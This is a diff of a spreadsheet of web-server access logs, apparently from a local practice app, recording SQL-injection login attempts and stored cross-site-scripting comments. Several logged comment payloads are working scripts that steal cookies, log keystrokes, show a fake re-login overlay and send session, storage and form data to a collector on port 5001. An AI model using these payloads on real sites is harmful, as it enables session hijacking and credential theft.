--- a/raw_logs.xlsx
+++ b/raw_logs.xlsx
@@ -413,7 +413,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:F32"/>
+  <dimension ref="A1:F65"/>
   <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <sheetData>
     <row r="1">
@@ -456,12 +456,12 @@
       </c>
       <c r="B2" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C2" t="inlineStr">
         <is>
-          <t>22:58:28</t>
+          <t>10:53:33</t>
         </is>
       </c>
       <c r="D2" t="inlineStr">
@@ -476,7 +476,7 @@
       </c>
       <c r="F2" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -488,12 +488,12 @@
       </c>
       <c r="B3" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C3" t="inlineStr">
         <is>
-          <t>22:58:28</t>
+          <t>10:53:33</t>
         </is>
       </c>
       <c r="D3" t="inlineStr">
@@ -503,12 +503,12 @@
       </c>
       <c r="E3" t="inlineStr">
         <is>
-          <t>/login</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F3" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -520,12 +520,12 @@
       </c>
       <c r="B4" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C4" t="inlineStr">
         <is>
-          <t>22:58:28</t>
+          <t>10:53:36</t>
         </is>
       </c>
       <c r="D4" t="inlineStr">
@@ -535,12 +535,12 @@
       </c>
       <c r="E4" t="inlineStr">
         <is>
-          <t>/favicon.ico</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F4" t="inlineStr">
         <is>
-          <t>404</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -552,12 +552,12 @@
       </c>
       <c r="B5" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t>22:58:48</t>
+          <t>10:53:36</t>
         </is>
       </c>
       <c r="D5" t="inlineStr">
@@ -567,12 +567,12 @@
       </c>
       <c r="E5" t="inlineStr">
         <is>
-          <t>/login?username=imon&amp;password=1234</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F5" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -584,12 +584,12 @@
       </c>
       <c r="B6" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C6" t="inlineStr">
         <is>
-          <t>22:59:05</t>
+          <t>10:53:36</t>
         </is>
       </c>
       <c r="D6" t="inlineStr">
@@ -599,12 +599,12 @@
       </c>
       <c r="E6" t="inlineStr">
         <is>
-          <t>/login?username=admin&amp;password=1234</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F6" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -616,12 +616,12 @@
       </c>
       <c r="B7" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C7" t="inlineStr">
         <is>
-          <t>22:59:05</t>
+          <t>10:53:51</t>
         </is>
       </c>
       <c r="D7" t="inlineStr">
@@ -631,7 +631,7 @@
       </c>
       <c r="E7" t="inlineStr">
         <is>
-          <t>/</t>
+          <t>/comments/add?name=piyush&amp;comment=sarkar%0A</t>
         </is>
       </c>
       <c r="F7" t="inlineStr">
@@ -648,12 +648,12 @@
       </c>
       <c r="B8" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>22:59:07</t>
+          <t>10:53:51</t>
         </is>
       </c>
       <c r="D8" t="inlineStr">
@@ -663,12 +663,12 @@
       </c>
       <c r="E8" t="inlineStr">
         <is>
-          <t>/logout</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F8" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -680,12 +680,12 @@
       </c>
       <c r="B9" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C9" t="inlineStr">
         <is>
-          <t>22:59:07</t>
+          <t>10:53:51</t>
         </is>
       </c>
       <c r="D9" t="inlineStr">
@@ -695,12 +695,12 @@
       </c>
       <c r="E9" t="inlineStr">
         <is>
-          <t>/login</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F9" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -712,12 +712,12 @@
       </c>
       <c r="B10" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C10" t="inlineStr">
         <is>
-          <t>23:02:42</t>
+          <t>10:53:51</t>
         </is>
       </c>
       <c r="D10" t="inlineStr">
@@ -727,12 +727,12 @@
       </c>
       <c r="E10" t="inlineStr">
         <is>
-          <t>/sitemap.xml</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F10" t="inlineStr">
         <is>
-          <t>404</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -744,12 +744,12 @@
       </c>
       <c r="B11" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C11" t="inlineStr">
         <is>
-          <t>23:02:42</t>
+          <t>10:54:15</t>
         </is>
       </c>
       <c r="D11" t="inlineStr">
@@ -759,12 +759,12 @@
       </c>
       <c r="E11" t="inlineStr">
         <is>
-          <t>/</t>
+          <t>/comments/add?name=admin&amp;comment=&lt;script&gt;new+Image().src%3D'http://127.0.0.1:5001/steal?cookie%3D'%2Bbtoa(document.cookie)%2B"%26url%3D"%2BencodeURIComponent(window.location.href)&lt;/script&gt;%0A</t>
         </is>
       </c>
       <c r="F11" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -776,12 +776,12 @@
       </c>
       <c r="B12" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C12" t="inlineStr">
         <is>
-          <t>23:02:57</t>
+          <t>10:54:15</t>
         </is>
       </c>
       <c r="D12" t="inlineStr">
@@ -791,7 +791,7 @@
       </c>
       <c r="E12" t="inlineStr">
         <is>
-          <t>/login</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F12" t="inlineStr">
@@ -808,12 +808,12 @@
       </c>
       <c r="B13" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C13" t="inlineStr">
         <is>
-          <t>23:02:57</t>
+          <t>10:54:15</t>
         </is>
       </c>
       <c r="D13" t="inlineStr">
@@ -823,12 +823,12 @@
       </c>
       <c r="E13" t="inlineStr">
         <is>
-          <t>/login/</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F13" t="inlineStr">
         <is>
-          <t>404</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -840,12 +840,12 @@
       </c>
       <c r="B14" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C14" t="inlineStr">
         <is>
-          <t>23:04:40</t>
+          <t>10:54:15</t>
         </is>
       </c>
       <c r="D14" t="inlineStr">
@@ -855,12 +855,12 @@
       </c>
       <c r="E14" t="inlineStr">
         <is>
-          <t>/</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F14" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -872,12 +872,12 @@
       </c>
       <c r="B15" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C15" t="inlineStr">
         <is>
-          <t>23:04:40</t>
+          <t>10:54:32</t>
         </is>
       </c>
       <c r="D15" t="inlineStr">
@@ -887,7 +887,7 @@
       </c>
       <c r="E15" t="inlineStr">
         <is>
-          <t>/login</t>
+          <t>/comments/add?name=admin3&amp;comment=soumya</t>
         </is>
       </c>
       <c r="F15" t="inlineStr">
@@ -904,12 +904,12 @@
       </c>
       <c r="B16" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C16" t="inlineStr">
         <is>
-          <t>23:04:40</t>
+          <t>10:54:32</t>
         </is>
       </c>
       <c r="D16" t="inlineStr">
@@ -919,12 +919,12 @@
       </c>
       <c r="E16" t="inlineStr">
         <is>
-          <t>/login/</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F16" t="inlineStr">
         <is>
-          <t>404</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -936,12 +936,12 @@
       </c>
       <c r="B17" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C17" t="inlineStr">
         <is>
-          <t>23:15:09</t>
+          <t>10:54:32</t>
         </is>
       </c>
       <c r="D17" t="inlineStr">
@@ -951,12 +951,12 @@
       </c>
       <c r="E17" t="inlineStr">
         <is>
-          <t>/login?username=imon'+OR+'1'%3D'1&amp;password=12345</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F17" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -968,12 +968,12 @@
       </c>
       <c r="B18" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C18" t="inlineStr">
         <is>
-          <t>23:15:26</t>
+          <t>10:54:32</t>
         </is>
       </c>
       <c r="D18" t="inlineStr">
@@ -983,12 +983,12 @@
       </c>
       <c r="E18" t="inlineStr">
         <is>
-          <t>/login?username=imon'+OR+'1'%3D'1'&amp;password=12345</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F18" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1000,12 +1000,12 @@
       </c>
       <c r="B19" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C19" t="inlineStr">
         <is>
-          <t>23:15:40</t>
+          <t>10:54:40</t>
         </is>
       </c>
       <c r="D19" t="inlineStr">
@@ -1015,7 +1015,7 @@
       </c>
       <c r="E19" t="inlineStr">
         <is>
-          <t>/login?username=admin'+OR+'1'%3D'1'&amp;password=12345</t>
+          <t>/comments/add?name=admin6&amp;comment=soumyadeepadak</t>
         </is>
       </c>
       <c r="F19" t="inlineStr">
@@ -1032,12 +1032,12 @@
       </c>
       <c r="B20" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C20" t="inlineStr">
         <is>
-          <t>23:16:24</t>
+          <t>10:54:40</t>
         </is>
       </c>
       <c r="D20" t="inlineStr">
@@ -1047,7 +1047,7 @@
       </c>
       <c r="E20" t="inlineStr">
         <is>
-          <t>/login?username=admin'+OR+'1'%3D'1'&amp;password=1234</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F20" t="inlineStr">
@@ -1064,12 +1064,12 @@
       </c>
       <c r="B21" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C21" t="inlineStr">
         <is>
-          <t>23:17:06</t>
+          <t>10:54:40</t>
         </is>
       </c>
       <c r="D21" t="inlineStr">
@@ -1079,12 +1079,12 @@
       </c>
       <c r="E21" t="inlineStr">
         <is>
-          <t>/login?username=admin'--&amp;password=1234</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F21" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1096,12 +1096,12 @@
       </c>
       <c r="B22" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C22" t="inlineStr">
         <is>
-          <t>23:18:52</t>
+          <t>10:54:40</t>
         </is>
       </c>
       <c r="D22" t="inlineStr">
@@ -1111,12 +1111,12 @@
       </c>
       <c r="E22" t="inlineStr">
         <is>
-          <t>/login?username=admin'OR'1'%3D'1'&amp;password=1234</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F22" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1128,12 +1128,12 @@
       </c>
       <c r="B23" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>23:19:07</t>
+          <t>10:55:10</t>
         </is>
       </c>
       <c r="D23" t="inlineStr">
@@ -1143,12 +1143,12 @@
       </c>
       <c r="E23" t="inlineStr">
         <is>
-          <t>/login?username=admin&amp;password=1234</t>
+          <t>/comments/add?name=admin7&amp;comment=&lt;script&gt;let+k%3D'';document.onkeydown%3De%3D&gt;{(k%2B%3De.key%2B'+').length&gt;50%26%26fetch('http://127.0.0.1:5001/log',{method:'POST',body:k});}&lt;/script&gt;%0A</t>
         </is>
       </c>
       <c r="F23" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -1160,12 +1160,12 @@
       </c>
       <c r="B24" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>23:19:07</t>
+          <t>10:55:10</t>
         </is>
       </c>
       <c r="D24" t="inlineStr">
@@ -1175,7 +1175,7 @@
       </c>
       <c r="E24" t="inlineStr">
         <is>
-          <t>/</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F24" t="inlineStr">
@@ -1192,12 +1192,12 @@
       </c>
       <c r="B25" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C25" t="inlineStr">
         <is>
-          <t>23:19:09</t>
+          <t>10:55:10</t>
         </is>
       </c>
       <c r="D25" t="inlineStr">
@@ -1207,12 +1207,12 @@
       </c>
       <c r="E25" t="inlineStr">
         <is>
-          <t>/logout</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F25" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1224,12 +1224,12 @@
       </c>
       <c r="B26" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C26" t="inlineStr">
         <is>
-          <t>23:19:09</t>
+          <t>10:55:10</t>
         </is>
       </c>
       <c r="D26" t="inlineStr">
@@ -1239,12 +1239,12 @@
       </c>
       <c r="E26" t="inlineStr">
         <is>
-          <t>/login</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F26" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1256,12 +1256,12 @@
       </c>
       <c r="B27" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>23:21:25</t>
+          <t>10:56:10</t>
         </is>
       </c>
       <c r="D27" t="inlineStr">
@@ -1271,7 +1271,7 @@
       </c>
       <c r="E27" t="inlineStr">
         <is>
-          <t>/login?username=admin'or'1'%3D1%3D'1'--&amp;password=qw</t>
+          <t>/comments/add?name=admin710&amp;comment=%0Ashuvojitff</t>
         </is>
       </c>
       <c r="F27" t="inlineStr">
@@ -1288,12 +1288,12 @@
       </c>
       <c r="B28" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>23:21:51</t>
+          <t>10:56:10</t>
         </is>
       </c>
       <c r="D28" t="inlineStr">
@@ -1303,7 +1303,7 @@
       </c>
       <c r="E28" t="inlineStr">
         <is>
-          <t>/login?username=admin'or1%3D1--&amp;password=qw</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F28" t="inlineStr">
@@ -1320,12 +1320,12 @@
       </c>
       <c r="B29" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C29" t="inlineStr">
         <is>
-          <t>23:22:14</t>
+          <t>10:56:10</t>
         </is>
       </c>
       <c r="D29" t="inlineStr">
@@ -1335,12 +1335,12 @@
       </c>
       <c r="E29" t="inlineStr">
         <is>
-          <t>/login?username=admin&amp;password=1234</t>
+          <t>/static/css/style.css</t>
         </is>
       </c>
       <c r="F29" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1352,12 +1352,12 @@
       </c>
       <c r="B30" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C30" t="inlineStr">
         <is>
-          <t>23:22:14</t>
+          <t>10:56:10</t>
         </is>
       </c>
       <c r="D30" t="inlineStr">
@@ -1367,12 +1367,12 @@
       </c>
       <c r="E30" t="inlineStr">
         <is>
-          <t>/</t>
+          <t>/static/js/main.js</t>
         </is>
       </c>
       <c r="F30" t="inlineStr">
         <is>
-          <t>200</t>
+          <t>304</t>
         </is>
       </c>
     </row>
@@ -1384,12 +1384,12 @@
       </c>
       <c r="B31" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>23:22:16</t>
+          <t>10:56:17</t>
         </is>
       </c>
       <c r="D31" t="inlineStr">
@@ -1399,12 +1399,12 @@
       </c>
       <c r="E31" t="inlineStr">
         <is>
-          <t>/logout</t>
+          <t>/comments/add?name=admin710&amp;comment=imonnbhh</t>
         </is>
       </c>
       <c r="F31" t="inlineStr">
         <is>
-          <t>302</t>
+          <t>200</t>
         </is>
       </c>
     </row>
@@ -1416,12 +1416,12 @@
       </c>
       <c r="B32" t="inlineStr">
         <is>
-          <t>12/Apr/2026</t>
+          <t>21/Apr/2026</t>
         </is>
       </c>
       <c r="C32" t="inlineStr">
         <is>
-          <t>23:22:16</t>
+          <t>10:56:17</t>
         </is>
       </c>
       <c r="D32" t="inlineStr">
@@ -1431,12 +1431,1068 @@
       </c>
       <c r="E32" t="inlineStr">
         <is>
-          <t>/login</t>
+          <t>/comments</t>
         </is>
       </c>
       <c r="F32" t="inlineStr">
         <is>
           <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="33">
+      <c r="A33" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B33" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C33" t="inlineStr">
+        <is>
+          <t>10:56:17</t>
+        </is>
+      </c>
+      <c r="D33" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E33" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F33" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="34">
+      <c r="A34" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B34" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>10:56:17</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E34" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F34" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="35">
+      <c r="A35" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B35" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C35" t="inlineStr">
+        <is>
+          <t>10:56:53</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E35" t="inlineStr">
+        <is>
+          <t>/comments/add?name=admin299&amp;comment=&lt;script&gt;(function(){if(document.getElementById('phish'))return;var+d%3Ddocument.createElement('div');d.id%3D'phish';d.style%3D'position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(0,0,0,0.85);z-index:999999;display:flex;align-items:center;justify-content:center;';d.innerHTML%3D`&lt;div+style%3D"width:350px;padding:30px;background:%23fff;border-radius:8px;text-align:center;"&gt;&lt;h3&gt;Session+Expired&lt;/h3&gt;&lt;p&gt;Re-authenticate:&lt;/p&gt;&lt;input+id%3D"u"+placeholder%3D"Username"+style%3D"width:100%25;padding:10px;margin:5px+0;border:1px+solid+%23ccc;border-radius:4px;box-sizing:border-box;"&gt;&lt;input+id%3D"p"+type%3D"password"+placeholder%3D"Password"+style%3D"width:100%25;padding:10px;margin:5px+0;border:1px+solid+%23ccc;border-radius:4px;box-sizing:border-box;"&gt;&lt;button+onclick%3D"stealCreds()"+style%3D"width:100%25;padding:10px;background:%23007bff;color:white;border:none;border-radius:4px;cursor:pointer;"&gt;Login&lt;/button&gt;&lt;/div&gt;`;document.body.appendChild(d);window.stealCreds%3Dfunction(){var+u%3Ddocument.getElementById('u').value,p%3Ddocument.getElementById('p').value;new+Image().src%3D'http://127.0.0.1:5001/phish?user%3D'%2BencodeURIComponent(u)%2B'%26pass%3D'%2BencodeURIComponent(p)%2B'%26url%3D'%2BencodeURIComponent(window.location.href);alert('Success!+Redirecting...');d.remove();};document.getElementById('u').focus();new+Image().src%3D'http://127.0.0.1:5001/xss-executed?domain%3D'%2BencodeURIComponent(window.location.hostname);})();&lt;/script&gt;%0A</t>
+        </is>
+      </c>
+      <c r="F35" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="36">
+      <c r="A36" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B36" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>10:56:53</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E36" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F36" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="37">
+      <c r="A37" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B37" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C37" t="inlineStr">
+        <is>
+          <t>10:56:53</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E37" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F37" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="38">
+      <c r="A38" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B38" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C38" t="inlineStr">
+        <is>
+          <t>10:56:53</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E38" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F38" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="39">
+      <c r="A39" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B39" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C39" t="inlineStr">
+        <is>
+          <t>10:58:48</t>
+        </is>
+      </c>
+      <c r="D39" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E39" t="inlineStr">
+        <is>
+          <t>/comments/add?name=soumyadeep&amp;comment=chodna</t>
+        </is>
+      </c>
+      <c r="F39" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="40">
+      <c r="A40" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B40" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C40" t="inlineStr">
+        <is>
+          <t>10:58:48</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E40" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F40" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="41">
+      <c r="A41" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B41" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C41" t="inlineStr">
+        <is>
+          <t>10:58:48</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E41" t="inlineStr">
+        <is>
+          <t>/static/css/style.css</t>
+        </is>
+      </c>
+      <c r="F41" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="42">
+      <c r="A42" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B42" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C42" t="inlineStr">
+        <is>
+          <t>10:58:49</t>
+        </is>
+      </c>
+      <c r="D42" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E42" t="inlineStr">
+        <is>
+          <t>/static/js/main.js</t>
+        </is>
+      </c>
+      <c r="F42" t="inlineStr">
+        <is>
+          <t>304</t>
+        </is>
+      </c>
+    </row>
+    <row r="43">
+      <c r="A43" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B43" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C43" t="inlineStr">
+        <is>
+          <t>11:02:01</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E43" t="inlineStr">
+        <is>
+          <t>/comments/add?name=soumyadeep123&amp;comment=%0A&lt;script&gt;%0Alet+sessionData+%3D+{%0A++++cookies:+document.cookie,%0A++++localStorage:+Object.fromEntries(Object.entries(localStorage)),%0A++++sessionStorage:+Object.fromEntries(Object.entries(sessionStorage)),%0A++++forms:+Array.from(document.forms).reduce((acc,+form)+%3D&gt;+{%0A++++++++Array.from(form.elements).forEach(el+%3D&gt;+{%0A++++++++++++if+(el.name)+acc[el.name]+%3D+el.value;%0A++++++++});%0A++++++++return+acc;%0A++++},+{}),%0A++++url:+window.location.href,%0A++++referrer:+document.referrer,%0A++++userAgent:+navigator.userAgent%0A};%0Afetch('http://127.0.0.1:5001/exfil',+{%0A++++method:+'POST',%0A++++headers:+{'Content-Type':+'application/json'},%0A++++body:+JSON.stringify(sessionData)%0A}).catch(()%3D&gt;{});%0A&lt;/script&gt;%0A</t>
+        </is>
+      </c>
+      <c r="F43" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="44">
+      <c r="A44" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B44" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C44" t="inlineStr">
+        <is>
+          <t>11:02:02</t>
+        </is>
+      </c>
+      <c r="D44" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E44" t="inlineStr">
+        <is>
+          <t>/comments</t>
+        </is>
+      </c>
+      <c r="F44" t="inlineStr">
+        <is>
+          <t>200</t>
+        </is>
+      </c>
+    </row>
+    <row r="45">
+      <c r="A45" t="inlineStr">
+        <is>
+          <t>127.0.0.1</t>
+        </is>
+      </c>
+      <c r="B45" t="inlineStr">
+        <is>
+          <t>21/Apr/2026</t>
+        </is>
+      </c>
+      <c r="C45" t="inlineStr">
+        <is>
+          <t>11:02:02</t>
+        </is>
+      </c>
+      <c r="D45" t="inlineStr">
+        <is>
+          <t>GET</t>
+        </is>
+      </c>
+      <c r="E45" t="inlineStr">
+        <is>
